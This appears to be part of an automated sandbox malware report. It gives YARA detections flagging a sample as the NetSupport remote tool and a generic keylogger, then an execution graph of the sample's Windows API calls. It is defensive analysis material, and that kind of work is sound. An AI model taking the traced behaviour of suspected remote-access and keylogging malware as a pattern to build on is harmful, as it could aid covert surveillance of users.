                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000000.1965850134.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:12.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:26.6%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:25
                                                                                        execution_graph 26213 7ff6fe1b0df5 14 API calls _com_raise_error 26218 7ff6fe1b2d6c 26243 7ff6fe1b27fc 26218->26243 26221 7ff6fe1b2eb8 26342 7ff6fe1b3170 7 API calls 2 library calls 26221->26342 26222 7ff6fe1b2d88 __scrt_acquire_startup_lock 26224 7ff6fe1b2ec2 26222->26224 26226 7ff6fe1b2da6 26222->26226 26343 7ff6fe1b3170 7 API calls 2 library calls 26224->26343 26227 7ff6fe1b2dcb 26226->26227 26230 7ff6fe1b2de8 __scrt_release_startup_lock 26226->26230 26251 7ff6fe1bcd90 26226->26251 26228 7ff6fe1b2ecd abort 26231 7ff6fe1b2e51 26230->26231 26339 7ff6fe1bc050 35 API calls __GSHandlerCheck_EH 26230->26339 26255 7ff6fe1b32bc 26231->26255 26233 7ff6fe1b2e56 26258 7ff6fe1bcd20 26233->26258 26344 7ff6fe1b2fb0 26243->26344 26246 7ff6fe1b282b 26346 7ff6fe1bcc50 26246->26346 26249 7ff6fe1b2827 26249->26221 26249->26222 26252 7ff6fe1bcdcc 26251->26252 26253 7ff6fe1bcdeb 26251->26253 26252->26253 26363 7ff6fe181120 26252->26363 26253->26230 26406 7ff6fe1b3cf0 26255->26406 26408 7ff6fe1c0730 26258->26408 26260 7ff6fe1bcd2f 26261 7ff6fe1b2e5e 26260->26261 26412 7ff6fe1c0ac0 35 API calls _snwprintf 26260->26412 26263 7ff6fe1b0754 26261->26263 26414 7ff6fe19dfd0 26263->26414 26267 7ff6fe1b079a 26501 7ff6fe1a946c 26267->26501 26269 7ff6fe1b07a4 memcpy_s 26506 7ff6fe1a9a14 26269->26506 26271 7ff6fe1b0ddc 26273 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26271->26273 26272 7ff6fe1b096e GetCommandLineW 26275 7ff6fe1b0980 26272->26275 26276 7ff6fe1b0b42 26272->26276 26274 7ff6fe1b0de2 26273->26274 26279 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26274->26279 26563 7ff6fe18129c 26275->26563 26516 7ff6fe196454 26276->26516 26277 7ff6fe1b0819 26277->26271 26277->26272 26281 7ff6fe1b0de8 26279->26281 26280 7ff6fe1b0b51 26285 7ff6fe181fa0 31 API calls 26280->26285 26289 7ff6fe1b0b68 memcpy_s 26280->26289 26287 7ff6fe1b1900 _com_raise_error 14 API calls 26281->26287 26283 7ff6fe181fa0 31 API calls 26286 7ff6fe1b0b93 SetEnvironmentVariableW GetLocalTime 26283->26286 26284 7ff6fe1b09a5 26573 7ff6fe1acad0 102 API calls 3 library calls 26284->26573 26285->26289 26528 7ff6fe193e28 26286->26528 26291 7ff6fe1b0e34 26287->26291 26289->26283 26292 7ff6fe1b09af 26292->26274 26295 7ff6fe1b09f9 OpenFileMappingW 26292->26295 26296 7ff6fe1b0adb 26292->26296 26298 7ff6fe1b0ad0 CloseHandle 26295->26298 26299 7ff6fe1b0a19 MapViewOfFile 26295->26299 26304 7ff6fe18129c 33 API calls 26296->26304 26298->26276 26299->26298 26301 7ff6fe1b0a3f UnmapViewOfFile MapViewOfFile 26299->26301 26301->26298 26302 7ff6fe1b0a71 26301->26302 26574 7ff6fe1aa190 33 API calls 2 library calls 26302->26574 26303 7ff6fe1b0c75 26556 7ff6fe1a67b4 26303->26556 26305 7ff6fe1b0b00 26304->26305 26578 7ff6fe1afd0c 35 API calls 2 library calls 26305->26578 26309 7ff6fe1b0a81 26575 7ff6fe1afd0c 35 API calls 2 library calls 26309->26575 26311 7ff6fe1b0b0a 26311->26276 26317 7ff6fe1b0dd7 26311->26317 26313 7ff6fe1a67b4 33 API calls 26315 7ff6fe1b0c87 DialogBoxParamW 26313->26315 26314 7ff6fe1b0a90 26576 7ff6fe19b9b4 102 API calls 26314->26576 26321 7ff6fe1b0cd3 26315->26321 26320 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26317->26320 26318 7ff6fe1b0aa5 26577 7ff6fe19bb00 102 API calls 26318->26577 26320->26271 26322 7ff6fe1b0ce6 Sleep 26321->26322 26323 7ff6fe1b0cec 26321->26323 26322->26323 26325 7ff6fe1b0cfa 26323->26325 26579 7ff6fe1a9f4c 49 API calls 2 library calls 26323->26579 26324 7ff6fe1b0ab8 26326 7ff6fe1b0ac7 UnmapViewOfFile 26324->26326 26328 7ff6fe1b0d06 DeleteObject 26325->26328 26326->26298 26329 7ff6fe1b0d1f DeleteObject 26328->26329 26330 7ff6fe1b0d25 26328->26330 26329->26330 26331 7ff6fe1b0d6d 26330->26331 26332 7ff6fe1b0d5b 26330->26332 26559 7ff6fe1a94e4 26331->26559 26580 7ff6fe1afe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26332->26580 26335 7ff6fe1b0d60 CloseHandle 26335->26331 26339->26231 26342->26224 26343->26228 26345 7ff6fe1b281e __scrt_dllmain_crt_thread_attach 26344->26345 26345->26246 26345->26249 26347 7ff6fe1c0d4c 26346->26347 26348 7ff6fe1b2830 26347->26348 26351 7ff6fe1bec00 26347->26351 26348->26249 26350 7ff6fe1b51a0 7 API calls 2 library calls 26348->26350 26350->26249 26362 7ff6fe1bf398 EnterCriticalSection 26351->26362 26368 7ff6fe1891c8 26363->26368 26367 7ff6fe1b2a01 26367->26252 26376 7ff6fe1956a4 26368->26376 26370 7ff6fe1891df 26379 7ff6fe19b788 26370->26379 26374 7ff6fe181130 26375 7ff6fe1b29bc 34 API calls 26374->26375 26375->26367 26385 7ff6fe1956e8 26376->26385 26394 7ff6fe1813a4 26379->26394 26382 7ff6fe189a28 26383 7ff6fe1956e8 2 API calls 26382->26383 26384 7ff6fe189a36 26383->26384 26384->26374 26386 7ff6fe1956fe memcpy_s 26385->26386 26389 7ff6fe19eba4 26386->26389 26392 7ff6fe19eb58 GetCurrentProcess GetProcessAffinityMask 26389->26392 26393 7ff6fe1956de 26392->26393 26393->26370 26395 7ff6fe1813ad 26394->26395 26403 7ff6fe18142d 26394->26403 26396 7ff6fe18143d 26395->26396 26397 7ff6fe1813ce 26395->26397 26405 7ff6fe182018 33 API calls std::_Xinvalid_argument 26396->26405 26400 7ff6fe1b21d0 33 API calls 26397->26400 26401 7ff6fe1813db memcpy_s 26397->26401 26400->26401 26404 7ff6fe18197c 31 API calls _invalid_parameter_noinfo_noreturn 26401->26404 26403->26382 26404->26403 26407 7ff6fe1b32d3 GetStartupInfoW 26406->26407 26407->26233 26409 7ff6fe1c073d 26408->26409 26411 7ff6fe1c0749 26408->26411 26413 7ff6fe1c0570 48 API calls 4 library calls 26409->26413 26411->26260 26412->26260 26413->26411 26581 7ff6fe1b2450 26414->26581 26417 7ff6fe19e026 GetProcAddress 26420 7ff6fe19e053 GetProcAddress 26417->26420 26421 7ff6fe19e03b 26417->26421 26418 7ff6fe19e07b 26419 7ff6fe19e503 26418->26419 26614 7ff6fe1bb788 39 API calls 2 library calls 26418->26614 26423 7ff6fe196454 34 API calls 26419->26423 26420->26418 26424 7ff6fe19e068 26420->26424 26421->26420 26426 7ff6fe19e50c 26423->26426 26424->26418 26425 7ff6fe19e3b0 26425->26419 26427 7ff6fe19e3ba 26425->26427 26583 7ff6fe197df4 26426->26583 26429 7ff6fe196454 34 API calls 26427->26429 26430 7ff6fe19e3c3 CreateFileW 26429->26430 26432 7ff6fe19e4f0 CloseHandle 26430->26432 26433 7ff6fe19e403 SetFilePointer 26430->26433 26435 7ff6fe181fa0 31 API calls 26432->26435 26433->26432 26434 7ff6fe19e41c ReadFile 26433->26434 26434->26432 26436 7ff6fe19e444 26434->26436 26435->26419 26437 7ff6fe19e800 26436->26437 26438 7ff6fe19e458 26436->26438 26620 7ff6fe1b2624 8 API calls 26437->26620 26443 7ff6fe18129c 33 API calls 26438->26443 26440 7ff6fe19e805 26441 7ff6fe19e53e CompareStringW 26454 7ff6fe19e51a 26441->26454 26442 7ff6fe18129c 33 API calls 26442->26454 26447 7ff6fe19e48f 26443->26447 26446 7ff6fe181fa0 31 API calls 26446->26454 26450 7ff6fe19e4db 26447->26450 26615 7ff6fe19d0a0 33 API calls 26447->26615 26448 7ff6fe19e7c2 26452 7ff6fe181fa0 31 API calls 26448->26452 26449 7ff6fe19e648 26616 7ff6fe197eb0 47 API calls 26449->26616 26455 7ff6fe181fa0 31 API calls 26450->26455 26457 7ff6fe19e7cb 26452->26457 26454->26441 26454->26442 26454->26446 26464 7ff6fe19e5cc 26454->26464 26591 7ff6fe1951a4 26454->26591 26596 7ff6fe198090 26454->26596 26600 7ff6fe1932bc 26454->26600 26458 7ff6fe19e4e5 26455->26458 26456 7ff6fe19e651 26459 7ff6fe1951a4 9 API calls 26456->26459 26461 7ff6fe181fa0 31 API calls 26457->26461 26462 7ff6fe181fa0 31 API calls 26458->26462 26463 7ff6fe19e656 26459->26463 26460 7ff6fe18129c 33 API calls 26460->26464 26465 7ff6fe19e7d5 26461->26465 26462->26432 26466 7ff6fe19e661 26463->26466 26467 7ff6fe19e706 26463->26467 26464->26460 26468 7ff6fe198090 47 API calls 26464->26468 26473 7ff6fe181fa0 31 API calls 26464->26473 26475 7ff6fe1932bc 51 API calls 26464->26475 26480 7ff6fe19e63a 26464->26480 26469 7ff6fe1b2320 _handle_error 8 API calls 26465->26469 26476 7ff6fe19aae0 48 API calls 26466->26476 26470 7ff6fe19da98 48 API calls 26467->26470 26468->26464 26471 7ff6fe19e7e4 26469->26471 26472 7ff6fe19e74b AllocConsole 26470->26472 26491 7ff6fe1962dc GetCurrentDirectoryW 26471->26491 26474 7ff6fe19e755 GetCurrentProcessId AttachConsole 26472->26474 26490 7ff6fe19e6fb 26472->26490 26473->26464 26477 7ff6fe19e76c 26474->26477 26475->26464 26479 7ff6fe19e6a5 26476->26479 26483 7ff6fe19e778 GetStdHandle WriteConsoleW Sleep FreeConsole 26477->26483 26482 7ff6fe19da98 48 API calls 26479->26482 26480->26448 26480->26449 26481 7ff6fe19e7b9 ExitProcess 26484 7ff6fe19e6c3 26482->26484 26483->26490 26485 7ff6fe19aae0 48 API calls 26484->26485 26486 7ff6fe19e6ce 26485->26486 26617 7ff6fe19dc2c 33 API calls 26486->26617 26488 7ff6fe19e6da 26618 7ff6fe1819e0 31 API calls _invalid_parameter_noinfo_noreturn 26488->26618 26619 7ff6fe1819e0 31 API calls _invalid_parameter_noinfo_noreturn 26490->26619 26492 7ff6fe196300 26491->26492 26497 7ff6fe19638d 26491->26497 26493 7ff6fe1813a4 33 API calls 26492->26493 26494 7ff6fe19631b GetCurrentDirectoryW 26493->26494 26495 7ff6fe196341 26494->26495 26736 7ff6fe1820b0 26495->26736 26497->26267 26498 7ff6fe19634f 26498->26497 26499 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26498->26499 26500 7ff6fe1963a9 26499->26500 26502 7ff6fe19dd88 26501->26502 26503 7ff6fe1a9481 OleInitialize 26502->26503 26504 7ff6fe1a94a7 26503->26504 26505 7ff6fe1a94cd SHGetMalloc 26504->26505 26505->26269 26507 7ff6fe1a9a49 26506->26507 26509 7ff6fe1a9a4e memcpy_s 26506->26509 26508 7ff6fe181fa0 31 API calls 26507->26508 26508->26509 26510 7ff6fe181fa0 31 API calls 26509->26510 26512 7ff6fe1a9a7d memcpy_s 26509->26512 26510->26512 26511 7ff6fe181fa0 31 API calls 26513 7ff6fe1a9aac memcpy_s 26511->26513 26512->26511 26512->26513 26514 7ff6fe181fa0 31 API calls 26513->26514 26515 7ff6fe1a9adb memcpy_s 26513->26515 26514->26515 26515->26277 26517 7ff6fe1813a4 33 API calls 26516->26517 26518 7ff6fe196489 26517->26518 26519 7ff6fe19648c GetModuleFileNameW 26518->26519 26522 7ff6fe1964dc 26518->26522 26520 7ff6fe1964de 26519->26520 26521 7ff6fe1964a7 26519->26521 26520->26522 26521->26518 26523 7ff6fe18129c 33 API calls 26522->26523 26525 7ff6fe196506 26523->26525 26524 7ff6fe19653e 26524->26280 26525->26524 26526 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26525->26526 26527 7ff6fe196560 26526->26527 26529 7ff6fe193e4d swprintf 26528->26529 26530 7ff6fe1b9ef0 swprintf 46 API calls 26529->26530 26531 7ff6fe193e69 SetEnvironmentVariableW GetModuleHandleW LoadIconW 26530->26531 26532 7ff6fe1ab014 LoadBitmapW 26531->26532 26533 7ff6fe1ab03e 26532->26533 26534 7ff6fe1ab046 26532->26534 26741 7ff6fe1a8624 FindResourceW 26533->26741 26535 7ff6fe1ab04e GetObjectW 26534->26535 26536 7ff6fe1ab063 26534->26536 26535->26536 26756 7ff6fe1a849c 26536->26756 26540 7ff6fe1ab0ce 26551 7ff6fe1998ac 26540->26551 26541 7ff6fe1ab09e 26761 7ff6fe1a8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26541->26761 26542 7ff6fe1a8624 11 API calls 26544 7ff6fe1ab08a 26542->26544 26544->26541 26546 7ff6fe1ab092 DeleteObject 26544->26546 26545 7ff6fe1ab0a7 26762 7ff6fe1a84cc 26545->26762 26546->26541 26550 7ff6fe1ab0bf DeleteObject 26550->26540 26769 7ff6fe1998dc 26551->26769 26553 7ff6fe1998ba 26836 7ff6fe19a43c GetModuleHandleW FindResourceW 26553->26836 26555 7ff6fe1998c2 26555->26303 26557 7ff6fe1b21d0 33 API calls 26556->26557 26558 7ff6fe1a67fa 26557->26558 26558->26313 26560 7ff6fe1a9501 26559->26560 26561 7ff6fe1a950a OleUninitialize 26560->26561 26562 7ff6fe1ee330 26561->26562 26564 7ff6fe18139b 26563->26564 26565 7ff6fe1812d0 26563->26565 26919 7ff6fe182004 33 API calls std::_Xinvalid_argument 26564->26919 26568 7ff6fe181338 26565->26568 26569 7ff6fe181396 26565->26569 26572 7ff6fe1812de memcpy_s 26565->26572 26571 7ff6fe1b21d0 33 API calls 26568->26571 26568->26572 26918 7ff6fe181f80 33 API calls 3 library calls 26569->26918 26571->26572 26572->26284 26573->26292 26574->26309 26575->26314 26576->26318 26577->26324 26578->26311 26579->26325 26580->26335 26582 7ff6fe19dff4 GetModuleHandleW 26581->26582 26582->26417 26582->26418 26584 7ff6fe197e0c 26583->26584 26585 7ff6fe197e23 26584->26585 26586 7ff6fe197e55 26584->26586 26588 7ff6fe18129c 33 API calls 26585->26588 26621 7ff6fe18704c 47 API calls memcpy_s 26586->26621 26590 7ff6fe197e47 26588->26590 26589 7ff6fe197e5a 26590->26454 26592 7ff6fe1951c8 GetVersionExW 26591->26592 26593 7ff6fe1951fb 26591->26593 26592->26593 26594 7ff6fe1b2320 _handle_error 8 API calls 26593->26594 26595 7ff6fe195228 26594->26595 26595->26454 26597 7ff6fe1980a5 26596->26597 26622 7ff6fe198188 26597->26622 26599 7ff6fe1980ca 26599->26454 26601 7ff6fe1932e4 26600->26601 26602 7ff6fe1932e7 GetFileAttributesW 26600->26602 26601->26602 26603 7ff6fe1932f8 26602->26603 26610 7ff6fe193375 26602->26610 26631 7ff6fe196a0c 26603->26631 26604 7ff6fe1b2320 _handle_error 8 API calls 26606 7ff6fe193389 26604->26606 26606->26454 26608 7ff6fe193323 GetFileAttributesW 26609 7ff6fe19333c 26608->26609 26609->26610 26611 7ff6fe193399 26609->26611 26610->26604 26612 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26611->26612 26613 7ff6fe19339e 26612->26613 26614->26425 26615->26447 26616->26456 26617->26488 26618->26490 26619->26481 26620->26440 26621->26589 26623 7ff6fe198326 26622->26623 26626 7ff6fe1981ba 26622->26626 26630 7ff6fe18704c 47 API calls memcpy_s 26623->26630 26625 7ff6fe19832b 26627 7ff6fe1981d4 memcpy_s 26626->26627 26629 7ff6fe1958a4 33 API calls 2 library calls 26626->26629 26627->26599 26629->26627 26630->26625 26632 7ff6fe196a4b 26631->26632 26651 7ff6fe196a44 26631->26651 26634 7ff6fe18129c 33 API calls 26632->26634 26633 7ff6fe1b2320 _handle_error 8 API calls 26635 7ff6fe19331f 26633->26635 26636 7ff6fe196a76 26634->26636 26635->26608 26635->26609 26637 7ff6fe196a96 26636->26637 26638 7ff6fe196cc7 26636->26638 26640 7ff6fe196ab0 26637->26640 26663 7ff6fe196b49 26637->26663 26639 7ff6fe1962dc 35 API calls 26638->26639 26644 7ff6fe196ce6 26639->26644 26641 7ff6fe1970ab 26640->26641 26704 7ff6fe18c098 33 API calls 2 library calls 26640->26704 26728 7ff6fe182004 33 API calls std::_Xinvalid_argument 26641->26728 26643 7ff6fe196eef 26647 7ff6fe1970cf 26643->26647 26725 7ff6fe18c098 33 API calls 2 library calls 26643->26725 26644->26643 26648 7ff6fe196d1b 26644->26648 26702 7ff6fe196b44 26644->26702 26645 7ff6fe1970b1 26655 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26645->26655 26731 7ff6fe182004 33 API calls std::_Xinvalid_argument 26647->26731 26654 7ff6fe1970bd 26648->26654 26707 7ff6fe18c098 33 API calls 2 library calls 26648->26707 26649 7ff6fe1970d5 26656 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26649->26656 26651->26633 26652 7ff6fe196b03 26664 7ff6fe181fa0 31 API calls 26652->26664 26670 7ff6fe196b15 memcpy_s 26652->26670 26729 7ff6fe182004 33 API calls std::_Xinvalid_argument 26654->26729 26661 7ff6fe1970b7 26655->26661 26662 7ff6fe1970db 26656->26662 26657 7ff6fe1970a6 26668 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26657->26668 26658 7ff6fe196f56 26726 7ff6fe1811cc 33 API calls memcpy_s 26658->26726 26672 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26661->26672 26674 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26662->26674 26669 7ff6fe18129c 33 API calls 26663->26669 26663->26702 26664->26670 26666 7ff6fe1970c3 26677 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26666->26677 26667 7ff6fe181fa0 31 API calls 26667->26702 26668->26641 26675 7ff6fe196bbe 26669->26675 26670->26667 26671 7ff6fe196f69 26727 7ff6fe1957ac 33 API calls memcpy_s 26671->26727 26672->26654 26673 7ff6fe181fa0 31 API calls 26687 7ff6fe196df5 26673->26687 26679 7ff6fe1970e1 26674->26679 26705 7ff6fe195820 33 API calls 26675->26705 26681 7ff6fe1970c9 26677->26681 26678 7ff6fe196d76 memcpy_s 26678->26666 26678->26673 26730 7ff6fe18704c 47 API calls memcpy_s 26681->26730 26682 7ff6fe196bd3 26706 7ff6fe18e164 33 API calls 2 library calls 26682->26706 26684 7ff6fe181fa0 31 API calls 26686 7ff6fe196fec 26684->26686 26689 7ff6fe181fa0 31 API calls 26686->26689 26693 7ff6fe196e21 26687->26693 26708 7ff6fe181744 26687->26708 26688 7ff6fe196f79 memcpy_s 26688->26662 26688->26684 26692 7ff6fe196ff6 26689->26692 26691 7ff6fe181fa0 31 API calls 26695 7ff6fe196c6d 26691->26695 26696 7ff6fe181fa0 31 API calls 26692->26696 26693->26681 26697 7ff6fe18129c 33 API calls 26693->26697 26694 7ff6fe196be9 memcpy_s 26694->26661 26694->26691 26699 7ff6fe181fa0 31 API calls 26695->26699 26696->26702 26698 7ff6fe196ec2 26697->26698 26721 7ff6fe182034 26698->26721 26699->26702 26701 7ff6fe196edf 26703 7ff6fe181fa0 31 API calls 26701->26703 26702->26645 26702->26649 26702->26651 26702->26657 26703->26702 26704->26652 26705->26682 26706->26694 26707->26678 26711 7ff6fe181784 26708->26711 26720 7ff6fe1818a1 26708->26720 26710 7ff6fe1818a7 26733 7ff6fe181f80 33 API calls 3 library calls 26710->26733 26711->26710 26715 7ff6fe1b21d0 33 API calls 26711->26715 26717 7ff6fe1817ac memcpy_s 26711->26717 26713 7ff6fe1818ad 26734 7ff6fe1b354c 31 API calls __std_exception_copy 26713->26734 26715->26717 26716 7ff6fe181859 memcpy_s 26716->26693 26717->26716 26719 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26717->26719 26718 7ff6fe1818d9 26718->26693 26719->26720 26732 7ff6fe182004 33 API calls std::_Xinvalid_argument 26720->26732 26722 7ff6fe182085 26721->26722 26724 7ff6fe182059 memcpy_s 26721->26724 26735 7ff6fe1815b8 33 API calls 3 library calls 26722->26735 26724->26701 26725->26658 26726->26671 26727->26688 26730->26647 26733->26713 26734->26718 26735->26724 26737 7ff6fe1820f6 26736->26737 26739 7ff6fe1820cb memcpy_s 26736->26739 26740 7ff6fe181474 33 API calls 3 library calls 26737->26740 26739->26498 26740->26739 26742 7ff6fe1a864f SizeofResource 26741->26742 26747 7ff6fe1a879b 26741->26747 26743 7ff6fe1a8669 LoadResource 26742->26743 26742->26747 26744 7ff6fe1a8682 LockResource 26743->26744 26743->26747 26745 7ff6fe1a8697 GlobalAlloc 26744->26745 26744->26747 26746 7ff6fe1a86b8 GlobalLock 26745->26746 26745->26747 26748 7ff6fe1a8792 GlobalFree 26746->26748 26749 7ff6fe1a86ca memcpy_s 26746->26749 26747->26534 26748->26747 26750 7ff6fe1a86d8 CreateStreamOnHGlobal 26749->26750 26751 7ff6fe1a8789 GlobalUnlock 26750->26751 26752 7ff6fe1a86f6 GdipAlloc 26750->26752 26751->26748 26753 7ff6fe1a870b 26752->26753 26753->26751 26754 7ff6fe1a8772 26753->26754 26755 7ff6fe1a875a GdipCreateHBITMAPFromBitmap 26753->26755 26754->26751 26755->26754 26757 7ff6fe1a84cc 4 API calls 26756->26757 26758 7ff6fe1a84aa 26757->26758 26760 7ff6fe1a84b9 26758->26760 26767 7ff6fe1a8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26758->26767 26760->26540 26760->26541 26760->26542 26761->26545 26763 7ff6fe1a84de 26762->26763 26764 7ff6fe1a84e3 26762->26764 26768 7ff6fe1a8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26763->26768 26766 7ff6fe1a8df4 16 API calls _handle_error 26764->26766 26766->26550 26767->26760 26768->26764 26772 7ff6fe1998fe _snwprintf 26769->26772 26770 7ff6fe199973 26887 7ff6fe1968b0 48 API calls 26770->26887 26772->26770 26773 7ff6fe199a89 26772->26773 26776 7ff6fe1999fd 26773->26776 26779 7ff6fe1820b0 33 API calls 26773->26779 26774 7ff6fe181fa0 31 API calls 26774->26776 26775 7ff6fe19997d memcpy_s 26775->26774 26777 7ff6fe19a42e 26775->26777 26838 7ff6fe1924c0 26776->26838 26778 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26777->26778 26780 7ff6fe19a434 26778->26780 26779->26776 26783 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26780->26783 26785 7ff6fe19a43a 26783->26785 26784 7ff6fe199a22 26786 7ff6fe19204c 100 API calls 26784->26786 26788 7ff6fe199a2b 26786->26788 26787 7ff6fe199b17 26856 7ff6fe1ba450 26787->26856 26788->26780 26790 7ff6fe199a66 26788->26790 26794 7ff6fe1b2320 _handle_error 8 API calls 26790->26794 26791 7ff6fe199aad 26791->26787 26795 7ff6fe198e58 33 API calls 26791->26795 26793 7ff6fe1ba450 31 API calls 26807 7ff6fe199b57 __vcrt_FlsAlloc 26793->26807 26796 7ff6fe19a40e 26794->26796 26795->26791 26796->26553 26797 7ff6fe199c89 26798 7ff6fe192aa0 101 API calls 26797->26798 26810 7ff6fe199d5c 26797->26810 26801 7ff6fe199ca1 26798->26801 26802 7ff6fe1928d0 104 API calls 26801->26802 26801->26810 26808 7ff6fe199cc9 26802->26808 26807->26797 26807->26810 26864 7ff6fe192bb0 26807->26864 26873 7ff6fe1928d0 26807->26873 26878 7ff6fe192aa0 26807->26878 26808->26810 26830 7ff6fe199cd7 __vcrt_FlsAlloc 26808->26830 26888 7ff6fe1a0bbc MultiByteToWideChar 26808->26888 26883 7ff6fe19204c 26810->26883 26811 7ff6fe19a1ec 26827 7ff6fe19a2c2 26811->26827 26894 7ff6fe1bcf90 31 API calls 2 library calls 26811->26894 26813 7ff6fe19a157 26813->26811 26891 7ff6fe1bcf90 31 API calls 2 library calls 26813->26891 26814 7ff6fe19a14b 26814->26553 26817 7ff6fe19a2ae 26817->26827 26896 7ff6fe198cd0 33 API calls 2 library calls 26817->26896 26818 7ff6fe19a3a2 26820 7ff6fe1ba450 31 API calls 26818->26820 26819 7ff6fe19a249 26895 7ff6fe1bb7bc 31 API calls _invalid_parameter_noinfo_noreturn 26819->26895 26822 7ff6fe19a3cb 26820->26822 26825 7ff6fe1ba450 31 API calls 26822->26825 26823 7ff6fe198e58 33 API calls 26823->26827 26824 7ff6fe19a16d 26892 7ff6fe1bb7bc 31 API calls _invalid_parameter_noinfo_noreturn 26824->26892 26825->26810 26827->26818 26827->26823 26828 7ff6fe19a1d8 26828->26811 26893 7ff6fe198cd0 33 API calls 2 library calls 26828->26893 26830->26810 26830->26811 26830->26813 26830->26814 26831 7ff6fe19a429 26830->26831 26832 7ff6fe1a0f68 WideCharToMultiByte 26830->26832 26889 7ff6fe19aa88 45 API calls 2 library calls 26830->26889 26890 7ff6fe1ba270 31 API calls 2 library calls 26830->26890 26897 7ff6fe1b2624 8 API calls 26831->26897 26832->26830 26837 7ff6fe19a468 26836->26837 26837->26555 26839 7ff6fe1924fd CreateFileW 26838->26839 26841 7ff6fe1925ae GetLastError 26839->26841 26849 7ff6fe19266e 26839->26849 26842 7ff6fe196a0c 49 API calls 26841->26842 26843 7ff6fe1925dc 26842->26843 26844 7ff6fe1925e0 CreateFileW GetLastError 26843->26844 26850 7ff6fe19262c 26843->26850 26844->26850 26845 7ff6fe1926b1 SetFileTime 26848 7ff6fe1926cf 26845->26848 26846 7ff6fe192708 26847 7ff6fe1b2320 _handle_error 8 API calls 26846->26847 26851 7ff6fe19271b 26847->26851 26848->26846 26852 7ff6fe1820b0 33 API calls 26848->26852 26849->26845 26849->26848 26850->26849 26853 7ff6fe192736 26850->26853 26851->26784 26851->26791 26852->26846 26854 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26853->26854 26855 7ff6fe19273b 26854->26855 26857 7ff6fe1ba47d 26856->26857 26863 7ff6fe1ba492 26857->26863 26898 7ff6fe1bd69c 15 API calls memcpy_s 26857->26898 26859 7ff6fe1ba487 26899 7ff6fe1b78e4 31 API calls _invalid_parameter_noinfo 26859->26899 26861 7ff6fe1b2320 _handle_error 8 API calls 26862 7ff6fe199b37 26861->26862 26862->26793 26863->26861 26865 7ff6fe192bcd 26864->26865 26868 7ff6fe192be9 26864->26868 26870 7ff6fe192bfb 26865->26870 26900 7ff6fe18b9c4 99 API calls std::_Xinvalid_argument 26865->26900 26867 7ff6fe192c01 SetFilePointer 26869 7ff6fe192c1e GetLastError 26867->26869 26867->26870 26868->26867 26868->26870 26869->26870 26871 7ff6fe192c28 26869->26871 26870->26807 26871->26870 26901 7ff6fe18b9c4 99 API calls std::_Xinvalid_argument 26871->26901 26874 7ff6fe1928fd 26873->26874 26876 7ff6fe1928f6 26873->26876 26875 7ff6fe192320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26874->26875 26874->26876 26902 7ff6fe18b8a4 99 API calls std::_Xinvalid_argument 26874->26902 26875->26874 26876->26807 26903 7ff6fe192778 26878->26903 26881 7ff6fe192ac7 26881->26807 26884 7ff6fe192066 26883->26884 26886 7ff6fe192072 26883->26886 26884->26886 26911 7ff6fe1920d0 26884->26911 26887->26775 26888->26830 26889->26830 26890->26830 26891->26824 26892->26828 26893->26811 26894->26819 26895->26817 26896->26827 26897->26777 26898->26859 26899->26863 26909 7ff6fe192789 _snwprintf 26903->26909 26904 7ff6fe1927b5 26906 7ff6fe1b2320 _handle_error 8 API calls 26904->26906 26905 7ff6fe192890 SetFilePointer 26905->26904 26908 7ff6fe1928b8 GetLastError 26905->26908 26907 7ff6fe19281d 26906->26907 26907->26881 26910 7ff6fe18b9c4 99 API calls std::_Xinvalid_argument 26907->26910 26908->26904 26909->26904 26909->26905 26912 7ff6fe192102 26911->26912 26913 7ff6fe1920ea 26911->26913 26914 7ff6fe192126 26912->26914 26917 7ff6fe18b544 99 API calls 26912->26917 26913->26912 26915 7ff6fe1920f6 CloseHandle 26913->26915 26914->26886 26915->26912 26917->26914 26918->26564 29014 7ff6fe1bd94c 29015 7ff6fe1bd997 29014->29015 29016 7ff6fe1bd95b abort 29014->29016 29021 7ff6fe1bd69c 15 API calls memcpy_s 29015->29021 29016->29015 29018 7ff6fe1bd97e HeapAlloc 29016->29018 29020 7ff6fe1bbbc0 abort 2 API calls 29016->29020 29018->29016 29019 7ff6fe1bd995 29018->29019 29020->29016 29021->29019 29023 7ff6fe1b154b 29024 7ff6fe1b14a2 